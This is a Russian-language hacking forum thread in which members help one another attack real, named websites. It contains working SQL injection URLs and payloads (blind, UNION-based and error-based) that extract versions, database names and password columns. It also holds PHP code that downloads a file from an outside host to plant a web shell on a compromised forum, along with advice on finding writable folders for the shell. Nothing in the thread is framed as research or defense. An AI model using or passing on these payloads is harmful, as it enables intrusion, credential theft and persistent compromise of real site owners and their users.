Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,778
    Likes Received:
    853
    Reputations:
    857
    Конечно, можно !!!

    Но вывода я не нашёл. Так что крутил как Blind SQL.

    Там 5 ветка, так что тебе повезло.
    Code:
    http://cod.gamepolis.ru/xlrstats/index.php?func=player&playerid=1+and+substring((version()),1,1)=5
    Выдирай посимвольно через ASCII например вот так:

    Code:
    http://cod.gamepolis.ru/xlrstats/index.php?func=player&playerid=1+and+ascii(substring((version()),[COLOR=Magenta][SIZE=3]1[/SIZE][/COLOR],1))=53
    
    http://cod.gamepolis.ru/xlrstats/index.php?func=player&playerid=1+and+ascii(substring((version()),[COLOR=Magenta][SIZE=3]2[/SIZE][/COLOR],1))=46
    Часть данных:
    PHP:
    Current User:     cod4@95.154.113.66
    Sql Version
    :     5.1.58
    Current DB
    :     cod4
     
    _________________________
  2. root47

    root47 New Member

    Joined:
    2 Oct 2011
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Спасибо , ликани сыль на Blind SQL
     
  3. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,778
    Likes Received:
    853
    Reputations:
    857
    Вот неплохая статья
    тыц
     
    _________________________
  4. Fooog

    Fooog Elder - Старейшина

    Joined:
    19 Sep 2008
    Messages:
    309
    Likes Received:
    170
    Reputations:
    12
    Ребят, вопрос...
    Заливка шелла на воблу через плагины. (ajax_complete)
    Код:
    PHP:
    $linky="http://site.com/blabla/name.txt";
    $saved="./ololo.php";
    $from=fopen("$linky","r");
    $to=fopen("$saved","w");
    while(!
    feof($from)){
    $string=fgets($from,4096);
    fputs($to,$string);
    }
    fclose($to);
    echo 
    'done';
    fclose($from);
    При заходе на site.com/forum/ajax.php
    выбивает:

    Code:
    Warning: fopen(./ololo.php) [function.fopen]: failed to open stream: Permission denied in [path]/ajax.php(1279) : eval()'d code on line 4
    
    Warning: fputs(): supplied argument is not a valid stream resource in [path]/ajax.php(1279) : eval()'d code on line 7
    
    Warning: fputs(): supplied argument is not a valid stream resource in [path]/ajax.php(1279) : eval()'d code on line 7
    
    Warning: fputs(): supplied argument is not a valid stream resource in [path]/ajax.php(1279) : eval()'d code on line 7
    
    [куча таких же строчек]
    
    
    Warning: fclose(): supplied argument is not a valid stream resource in [path]/ajax.php(1279) : eval()'d code on line 9
    done
    Вопрос заключается в том, как же это исправить, либо, есть ли какая альтернатива?
     
  5. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    507
    Likes Received:
    105
    Reputations:
    53
    Нет прав на запись в эту папку для этого скрипта. Ищи ту, в которую можно залить (зачастую с картинками, css, js)
     
  6. Fooog

    Fooog Elder - Старейшина

    Joined:
    19 Sep 2008
    Messages:
    309
    Likes Received:
    170
    Reputations:
    12
    Вариант. Но ведь если невкакую не хочет. Все плагины перепробовал и везде ошибка. Как быть?
     
  7. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Искать папку с правами на запись. Вроде бы это очевидно.

    Посмотри куда заливаются аватарки на форуме, если не в БД сэйвятся, то лей в ту же директорию и шелл.
     
  8. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    507
    Likes Received:
    105
    Reputations:
    53
    Плагины тут не причём. Это нормальные настройки на сервере на всю папку. Ищи те, что я сказал, у некоторых цмс есть свои темповые папки или папки под кэш, в них должно залиться(upd: если они конечно юзались, а то так могут и стоять права, при которых ты не сможешь залить)
     
    #18148 Melfis, 27 Oct 2011
    Last edited: 27 Oct 2011
  9. Fooog

    Fooog Elder - Старейшина

    Joined:
    19 Sep 2008
    Messages:
    309
    Likes Received:
    170
    Reputations:
    12
    Насчет папки да. Разобрался.
    Да, да. Я и говорю о альтернативе...
    пс
    на этом форуме и аватарок нету.
     
    #18149 Fooog, 27 Oct 2011
    Last edited: 27 Oct 2011
  10. namez2

    namez2 New Member

    Joined:
    23 Aug 2010
    Messages:
    45
    Likes Received:
    1
    Reputations:
    0
    Помогите плиз. разобраться с таким выражением, как дальше его раскрутить? (все испробовал дальше не могу продвинуться, как то не стандартно с кавычками...)
    -ttp://www.passion.ru/piknik.php/view/(2)union(select(1),version(),3)
     
  11. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    130
    Likes Received:
    9
    Reputations:
    2
    Как бы раскрутить..:)

    Всем привет!
    В строку поиска ввожу qwe' asd
    Получаю такое:
    В строке поиска текст меняется на qwe\' asd
    Выводится ошибка:
    Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%') or (UPPER(`anot`) like '%ASD%') and (UPPER(`anot`) like '%QWE'%') or (UPP' at line 1

    Query: select * from `news` where ( (UPPER(`head`) like '%ASD%') and (UPPER(`head`) like '%QWE'%') or (UPPER(`anot`) like '%ASD%') and (UPPER(`anot`) like '%QWE'%') or (UPPER(`text`) like '%ASD%') and (UPPER(`text`) like '%QWE'%')) and `hide`=1 order by date desc


    Можно как-то раскрутить..? сам пробовал, что-то не получается :(
     
  12. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    507
    Likes Received:
    105
    Reputations:
    53
    Ток учти, что group_concat возвращает до 1кb инфы.

    Видно же где неправильно ты делаешь то.
    1') order by XXX--+
    и подбираешь кол-во столбцов, меняешь на юнион и вуаля. Или order by XXX--+ меняешь на error-based sql inj
     
    #18152 Melfis, 28 Oct 2011
    Last edited: 28 Oct 2011
  13. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Code:
    asd qwe'))ORDER/*wtf*/BY(10) -- 
    
    Code:
    asd qwe'))UNION(SELECT(1),(2),(3)from(table)) -- 
    

    Очевидно же, что нельзя допускать пробелов, так как идет explode(' ', $some) и после implode.
     
    1 person likes this.
  14. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    Такой вопрос, нашол нужную мне колонку
    http://goldsauna.ru/articles.html?id=-7%27+union+select+1,2,column_name,4,5+from+information_schema.columns+where+table_name=0x7573657273+limit+2,1--+

    хочу вывести
    http://goldsauna.ru/articles.html?id=-7+union+select+1,2,passwd,4,5+from+users--+

    а нифига не выводит, почему?
     
  15. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    130
    Likes Received:
    9
    Reputations:
    2
    Получилось вот так:
    Code:
    ass'))/**/and/**/1=(select/**/1/**/from(select/**/count(*),concat((select/**/concat_ws(':',user(),version(),database())),floor(Rand(0)*2))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)/**/and/**/(('1%'='1
    Всем спасибо!
     
  16. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886

    http://goldsauna.ru/articles.html?id=-7%27+union+select+1,2,passwd,4,5+from+goldsauna.users--+

    qaz


    эти элементарные шаги описаны почти во всех мануалах
     
    _________________________
  17. mandalina

    mandalina Member

    Joined:
    27 Jan 2009
    Messages:
    22
    Likes Received:
    19
    Reputations:
    4
    Извиняюсь что занимаю у вас время.Возник вопрос.Собсно сформулировал запрос вида

    Code:
    http://site.com/menu.php?form_id=-33+union+select+1,2,group_concat(column_name)+FROM+INFORMATION_SCHEMA.columns+where+table_name=char(99,109,115,95,115,121,115,116,101,109,95,117,115,101,114,115)--
    В браузере выдает

    Code:
    id,name,login,password,enabled
    Дальше пробую

    Code:
    http://site.com/menu.php?form_id=-33+union+select+1,2,group_concat(id,0x3a,user,0x3a,pass)+from+cms_system_users--
    Но ничего не выводит,собсно как правильно?Спасибо за внимание :)
     
  18. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    count(*)
     
  19. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    goldsauna - ето я так понимаю название БД, а как его узнать? каким запросом?
     
  20. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    колонка table_schema
     
    _________________________
Loading...
Thread Status:
Not open for further replies.